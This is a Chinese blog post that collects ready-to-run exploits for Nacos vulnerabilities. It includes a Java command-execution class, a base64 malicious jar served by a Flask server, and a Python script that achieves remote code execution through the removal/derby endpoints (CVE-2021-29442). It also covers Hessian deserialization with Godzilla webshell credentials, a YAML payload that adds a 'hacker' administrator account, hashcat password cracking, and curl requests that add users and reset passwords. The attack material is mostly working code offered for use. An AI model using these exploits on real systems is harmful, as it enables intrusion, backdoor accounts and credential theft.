【poc整合】Nacos漏洞整理(下)附Nacos漏洞整合利用工具——removal接口RCE、Hessian 反序列化、Yaml反序列化、密码解密、部分常用敏感路径(漏洞更新截止2024.9.12)

于 2024-09-13 09:59:44 发布
阅读量195 收藏 1
点赞数 6
分类专栏: POC整合 web安全 SRC挖掘 文章标签: 安全 网络安全 web安全 系统安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62783065/article/details/142187346
版权

本系列的宗旨就是不墨迹直接上poc,利用过程网上一堆,各位师傅随便搜下就好,各位看poc看爽了记得给个关注点个赞给个收藏,感谢各位师傅。

removal接口RCE CVE-2021-29442

远程加载jar包,使用derby数据库中的执行命令功能去执行jar包中的命令造成RCE(远程服务器上的jar包导入数据库,就可以动态调用类中的static方法)

直接在removal执行select是通不过的,因此先在removal处构造恶意自定义函数,再在derby接口通过select触发这个函数从而实现rce的功能

构造恶意类:

package test.poc;
 
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.io.StringWriter;
 
public class Example {
    public Example() {
    }
 
    public static void main(String[] args) {
        String ret = exec("ipconfig");
        System.out.println(ret);
    }
 
    public static String exec(String cmd) {
        StringBuffer bf = new StringBuffer();
 
        try {
            String charset = "utf-8";
            String osName = System.getProperty("os.name");
            if (osName != null && osName.startsWith("Windows")) {
                charset = "gbk";
            }
 
            Process p = Runtime.getRuntime().exec(cmd);
            InputStream fis = p.getInputStream();
            InputStreamReader isr = new InputStreamReader(fis, charset);
            BufferedReader br = new BufferedReader(isr);
            String line = null;
 
            while((line = br.readLine()) != null) {
                bf.append(line);
            }
        } catch (Exception var10) {
            StringWriter writer = new StringWriter();
            PrintWriter printer = new PrintWriter(writer);
            var10.printStackTrace(printer);
 
            try {
                writer.close();
                printer.close();
            } catch (IOException var9) {
            }
 
            return "ERROR:" + writer.toString();
        }
 
        return bf.toString();
    }
}

启动恶意服务端:python server.py,把上面的恶意类通过b64压缩处理,加载在flask服务端当作服务器资源

###python server.py
import base64
from flask import Flask, send_file,Response
import config
 
server_host = '127.0.0.1'
server_port = 5000
##java恶意数据:
payload = b'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'
 
app = Flask(__name__)
 
@app.route('/download')
def download_file():
    data = base64.b64decode(payload)
    response = Response(data, mimetype="application/octet-stream")
    # response.headers["Content-Disposition"] = "attachment; filename=file.bin"
    return response
 
if __name__ == '__main__':
    app.run(host=server_host, port=server_port)

利用脚本:python exploit.py

利用:python exploit.py
import random
import sys
import requests
from urllib.parse import urljoin
import config
 
def exploit(target, command, service):
    removal_url = urljoin(target,'/nacos/v1/cs/ops/data/removal')
    derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
    for i in range(0,sys.maxsize):
        id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',8))
        post_sql = """CALL sqlj.install_jar('{service}', 'NACOS.{id}', 0)\n
        CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','NACOS.{id}')\n
        CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec'\n""".format(id=id,service=service);
        option_sql = "UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{cmd}')\n".format(id=id,cmd=command);
        get_sql = "select * from (select count(*) as b, S_EXAMPLE_{id}('{cmd}') as a from config_info) tmp /*ROWS FETCH NEXT*/".format(id=id,cmd=command);
        #get_sql = "select * from users /*ROWS FETCH NEXT*/".format(id=id,cmd=command);
        files = {'file': post_sql}
        post_resp = requests.post(url=removal_url,files=files)
        post_json = post_resp.json()
        if post_json.get('message',None) is None and post_json.get('data',None) is not None:
            print(post_resp.text)
            get_resp = requests.get(url=derby_url,params={'sql':get_sql})
            print(get_resp.text)
            break
 
if __name__ == '__main__':
    service = 'http://{host}:{port}/download'.format(host=config.server_host,port=config.server_port)
    target = 'http://127.0.0.1:8848'
    command = 'calc'
    target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or target
    command = input('请输入命令,默认:calc:') or command
    exploit(target=target, command=command,service=service)

执行python exploit.py输入url和cmd即可rce

Hessian 反序列化 CNVD-2023-45001

利用版本:1.4.0 <= Nacos < 1.4.6

利用版本:2.0.0 <= Nacos < 2.2.3

Nacos默认的7848端口是用于Nacos集群间Raft协议的通信,该端口的服务在处理部分Jraft请求时会使用Hessian进行反序列化

工具https://github.com/c0olw/NacosRce一把嗦
哥斯拉
设置请求头x-client-data:godzilla  
设置Referer:https://www.google.com/
路径:URL+/nacos/
密码是pass 和 key
加密器是JAVA_AES_BASE64

Nacos-Client Yaml反序列化

工具:https://github.com/charonlight/NacosExploitGUI
须获得Nacos Server控制台权限,修改已有的配置为Yaml Payload进行盲打客户端的攻击

利用过程:

// 下载yaml-payload:https://github.com/artsploit/yaml-payload/,修改其中的命令执行参数
Runtime.getRuntime().exec("net user hacker Admin@123");
Runtime.getRuntime().exec("net localgroup administrators hacker /add");

编译

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

python -m http.server 12345起一个web服务,在NacosExploitGUI工具中Jar路径设定成http://xxxx:12345/yaml-payload.jar,dataId设定成后台配置列表中的dataId,比如db-config即可执行

密码解密

nacos密码bcrypt

hashcat -a 0 -m 3200 hashes.txt rockyou.txt -w 3 -O -D 1,2 --show

配置文件密文 jasypt

java -cp jasypt-1.9.3.jar org.jasypt.intf.cli.JasyptPBEStringEncryptionCLI input="123456" password="salt123" algorithm="PBEWithMD5AndDES"
java -cp jasypt-1.9.3.jar org.jasypt.intf.cli.JasyptPBEStringDecryptionCLI input="MecKdyPwwkD+AqUKPy1GlQ==" password="salt123" algorithm="PBEWithMD5AndDES"

部分常用渗透路径

http://127.0.0.1:8848/nacos/v1/console/server/state
http://xx.xx.xx.xx/v1/console/server/state
http://127.0.0.1:8848/nacos/v1/auth/users?search=accurate&pageNo=1&pageSize=9   get查询用户
curl -v --data-binary "username=test&password=123456" "http://127.0.0.1:8848/nacos/v1/auth/users"  post添加用户
curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -d 'username=test&newPassword=test123'  修改密码
http://127.0.0.1:8848/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99  获取配置信息
http://127.0.0.1:8848/nacos/v1/core/cluster/nodes  获取集群信息
curl --data-binary "username=nacos&password=nacos" "http://127.0.0.1:8848/nacos/v1/auth/users/login"  登陆

webfker from 0 to 1
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920)
qq_51577576的博客
02-17 743
[ vulhub漏洞复现篇 ] Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞(CVE-2017-6920) Drupal是使用PHP语言编写的开源内容管理框架,它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。CVE-2017- 6920 是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。
『Java安全反序列化-浅析Hessian反序列化POP链
Ho1aAs‘s Blog
07-22 1146
# 反序列化漏洞原理 在反序列化时,会通过标志位判断对象的类型,然后调用对应类的反序列化器 对应方法在`SerializerFactory.loadDeserializer()` 具体会**调用到Map的put方法**写入键值对 **对于Map类:会调用反序列化器的readMap方法进行反序列化操作**,默认反序列化出来的是HashMap类 而**HashMap的put方法就会调用键自身的hashCode方法来判断是否有重复**,进而就造成了漏洞风险,这里不再赘述 **对于TreeMap还有equals.
fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)
qq1140037586的博客
12-18 2236
漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞利用,获取服务器的敏感信息泄露,甚至可以利用漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。
13-java安全——fastjson1.2.24反序列化TemplatesImpl利用分析
网络安全
08-27 2840
漏洞环境: fastjson1.2.24 jdk1.7.80 新建一个maven项目在pom.xml文件中引入fastjson的依赖: <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24</v
java安全(七) 反序列化3 CC利用链 TransformedMap版
weixin_45694388的博客
04-21 3632
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤链是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用链图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
HackTheBox Precious CVE-2022-25765利用YAML反序列化攻击提权
Ba1_Ma0的博客
12-12 1915
HackTheBox靶机
shiro反序列化脚本.zip
07-28
标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架,它提供了身份验证、授权、会话管理和加密等功能。然而,在某些版本中,...
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
NACOS(Naming and Configuration Service)是一款开源的分布式配置中心和服务发现系统,广泛应用于微服务架构中,为各个服务提供动态、集中化的配置管理和服务发现功能。然而,如同任何复杂的软件系统,NACOS也可能...
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
Java反序列化实战.pdf
08-08
- **Ysoserial**:原生序列化PoC生成工具,可用于测试和验证潜在的序列化漏洞。 - **Marshalsec**:第三方格式序列化PoC生成工具,支持多种序列化方式。 - **Freddy**:Burp插件,用于测试和探测Java反序列化漏洞...
AI在医学领域:医学AI的安全与隐私全面概述
最新发布
声纹感知 洞察芯声
09-12 795
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1109
本文主要介绍网络安全认识与学习规划
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 915
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 267
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
个人信息记录安全:守护数字时代的隐私堡垒
大厂全栈码农
09-09 1364
同时,也强调了个人在保护自身信息方面的意识与行为的重要性,最后对个人信息记录安全的未来发展趋势进行了展望,旨在为构建更安全的个人信息环境提供全面且深入的思考。此外,在移动互联网时代,个人信息还存在于各种移动应用程序中,从社交软件、购物应用到金融理财 APP 等,这些应用在为用户提供便捷服务的同时,也收集和存储了大量的个人信息。例如,一些电商平台在用户浏览商品时,收集了大量与购物无关的个人信息,如地理位置、设备信息等,并将这些信息用于精准营销,甚至在用户不知情的情况下将信息共享给其他第三方公司。
企业应该如何安全上网,软件防查盗版,企业防盗版
cnsinda_htt的博客
09-12 283
SPN(Sandbox Proxy Network)反向沙盒安全上网解决方案,是直接把终端传统外网物理断开,然后在内网中部署一个沙盒安全上网网关主机,在需要访问外网的终端上安装一个沙盒,当需要访问互联网的时候,在这个隔离沙盒内访问互联网。当需要访问互联网时,用户可以在这个隔离沙盒内进行操作,确保主机本机和互联网物理隔离,只有沙盒能访问互联网,而沙盒和本机是完全隔离的。SPN沙盒安全上网解决方案为企业提供了一个安全、可靠的上网环境,帮助企业在信息化时代有效应对各种网络安全威胁,保障企业的核心数据和信息安全
GORM安全-保护你的应用免受SQL注入攻击
一起coding,一起嗨。
09-12 313
GORM安全-保护你的应用免受SQL注入攻击
网络安全宣传周 | DNS安全威胁与应对措施分享
weixin_53018687的博客
09-12 671
然而,DNS协议在设计初期只注重功能的实现,未充分考虑安全验证机制,缺乏有效的安全防御手段,DNS协议数据包往往能够在网络中畅通无阻,为攻击者提供了可乘之机,这一天生的设计缺陷使得DNS系统天然地成为了安全领域的薄弱环节。DNS劫持:DNS劫持是指攻击者通过篡改DNS解析结果,将用户的流量重定向到不同的IP地址,通常是恶意网站。DNS泛洪攻击:DNS洪泛攻击是一种拒绝服务攻击,攻击者通过发送大量的DNS请求,通常是伪造的或毫无意义的查询,消耗DNS服务器的资源,使其无法响应合法的查询请求。
Siri因ChatGPT-4o升级:我们的个人信息还安全吗?
m0_65134936的博客
09-12 702
随着人工智能技术的不断进步,智能语音助手如Siri、Alexa、Google Assistant等已成为我们生活的一部分。这些助手通过自然语言处理(NLP)技术与用户互动,提供更加个性化的服务。近期,ChatGPT-4o的引入为Siri带来了全新的功能和体验,但同时也引发了公众对于个人信息安全的深切关注。ChatGPT-4o的运行依赖于强大的数据中心和先进的计算机处理能力。当用户通过Siri与ChatGPT-4o交互时,每一次对话都会被发送到OpenAI的服务器进行处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

webfker from 0 to 1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值